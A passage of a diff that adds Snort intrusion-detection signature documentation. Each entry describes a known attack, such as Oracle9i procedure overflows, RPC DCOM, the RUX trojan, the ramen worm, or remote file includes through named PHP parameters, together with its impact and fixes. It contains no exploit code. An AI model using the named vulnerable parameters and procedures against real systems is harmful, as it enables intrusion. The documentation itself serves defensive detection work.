+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure rename_shadow_column_group
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/977.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 977
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3012.txt
@@ -0,0 +1,79 @@
+Rule: 
+
+--
+Sid: 
+3012
+-- 
+Summary: 
+This event is generated when an attacker attempts to remotely upload and
+execute a file with the RUX the Tick trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to an
+affected system, enabling him to upload and execute file on the machine.
+The attacker can use this function to upload additional backdoors to the
+victim's sytem and execute them. 
+
+--
+Detailed Information:
+When executed, RUX the Tick opens up its assigned port (default is
+22222) for communication with the attacker. RUX the Tick has three
+functions: Get Windows Directory, Get System Directory, and Upload And
+Execute File.
+
+Get Windows Directory and Get System Directory are used for
+reconnaissance. Upload And Execute File is mainly used to upload and run
+other backdoors onto the victim's computer.
+
+--
+Affected Systems:
+	Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoors in disguise. Once the victim
+mistakenly installs the server program, the attacker usually will employ
+an IP scanner program to find the IP addresses of victims that have
+installed the program. Then the attacker enters the IP address, port
+number (which  is assigned to the server program by the attacker:
+default is 22222), and presses the connect button and he has access to
+the computer.
+
+-- 
+Ease of Attack: 
+Simple.
+
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Using Windows Task Manager, kill these processes: ruxserver.exe and server.exe
+Use Windows Explorer to find ruxserver.exe and delete the file.
+
+This program may hide itself in the process list and can use different
+names and can exist in many locations on an infected machine.
+
+Keep anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com>
+
+-- 
+Additional References:
+
+PestPatrol:
+http://www.pestpatrol.com/PestInfo/R/RUX.ASP
+
+--
--- /dev/null
+++ b/doc/signatures/580.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+580
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) nisd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port nisd is using.  Attackers can also learn what versions of the nisd protocol are accepted by nisd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as nisd run.  The nisd RPC service implements Network Information Systems (NIS and NIS+).  NIS and NIS+ provide centralized management and distribution of information about resources, such as users and hosts, in a network domain.  A buffer overflow exists because of improper bounds checking, which can lead to execution of arbitrary commands on the host. 
+
+--
+Affected Systems:
+Solaris 2.3 - 2.6 hosts running NIS+.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where nisd runs.  This may be a precursor to accessing nisd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access nisd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for nisd, not probes of the nisd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the nisd service itself. An attacker may attempt to go directly to the nisd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/677
+
+CERT
+http://www.cert.org/advisories/CA-98.06.nisd.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS21
+
+
+--
--- /dev/null
+++ b/doc/signatures/3236.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3236
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/514.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+514
+
+--
+Summary:
+This activity is a sign of a host that has been compromised by the ramen worm, which is attempting to retrieve the worm binaries from a remote system.
+
+--
+Impact:
+Severe; this host issued a request to a malicious web server to download the ramen worm binaries.  After the binaries are downloaded, the compromised host acts as a scanner and could be used to attack other hosts.
+
+--
+Detailed Information:
+This rule looks for GET requests to a compromised webserver running on TCP port 27374.  The compromised webserver serves up the ramen binaries required to continue the propagation of the malicious code.  After the host is compromised, a random number generator selects IP address ranges to scan for other vulnerable hosts.  The ramen worm is wide spread, and affects vulnerable Red Hat Linux 6.2 and 7.0 machines.  The worm exploited well-known vulnerabilities in LPRng, rpc.statd, and wu-ftpd.
+
+--
+Attack Scenarios:
+This is a worm; after it is released, it self-propagates.  Once a vulnerable machine is found, worm binaries are downloaded and the newly compromised machine becomes a scanning agent to further the worm's propagation.
+
+--
+Ease of Attack:
+Simple execution of worm code.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+If the worm code is changed to contact a port other than 27374 tcp, then this rule would not catch the activity.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Original rule writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Mike Poor <mike.poor@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS461
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/l-040.shtml
+
+SANS:
+http://www.sans.org/y2k/ramen.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1509.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1509
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000396.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000396
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "options.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "options.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3417.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3417
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3114.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3114
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1033.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1033
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/908.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+908
+
+--
+Summary:
+This event is generated when an attempt is made to access the 
+administrator screens for Coldfusion server.  A long password can cause 
+a Denial-of-Service.
+
+--
+Impact:
+Denial of Service (DoS). While the risk as a target for password attacks is minor, the administrator login mechanism can be jammed by long passwords, leading to a DoS for the server.
+
+--
+Detailed Information:
+ColdFusion's administrator interface is reachable via:
+
+http://www.target.com/CFIDE/administrator/index.cfm
+
+It is recommended that access to these pages be restricted to trusted 
+IP addresses to prevent them being targets for password attacks.
+
+Further, long passwords create a Denial-of-Service state in the server 
+temporarily.
+
+See Macromedia Security Bulletin (MPSB01-08) for complete information.
+
+--
+Affected Systems:
+ColdFusion versions 4.x for Windows, Solaris, HP-UX, Linux
+
+--
+Attack Scenarios:
+The attacker can access the administration interface for the server and 
+gain control of the application.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+At minimum, restrict access to the administrator mechanism from within 
+the ColdFusion administrator screens.  Only internal, trusted users 
+should be allowed access.  For further protections, use the security 
+capabilities of the webserver or the OS to restrict access to the 
+CFIDE/administrator directory when not needed, or copy/remove the 
+CFIDE/administrator directory completely off the server when not in use 
+(it will be necessary to reload the directory before accessing admin 
+functions, of course).
+
+http://www.macromedia.com/support/coldfusion/ts/documents/tn17254.htm
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References:
+
+Allaire Security Bulletin (ASB00-14)
+http://www.macromedia.com/devnet/security/security_zone/asb00-14.html
+
+CVE-2000-0538
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0538
+
+--
--- /dev/null
+++ b/doc/signatures/2820.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2820
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_columns_from_flavor
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2797.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2797
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2281.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2281
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000501.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000501
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PictureDis" application running on a webserver. 
+Access to the file "wallpapr.php" using a remote file being passed as the 
+"lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "lang" parameter in the "wallpapr.php" script used by 
+the "PictureDis" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PictureDis
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3232.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3232
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3320.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3320
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1743.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1743
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/732.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+732
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000407.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000407
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "calday.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "calday.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
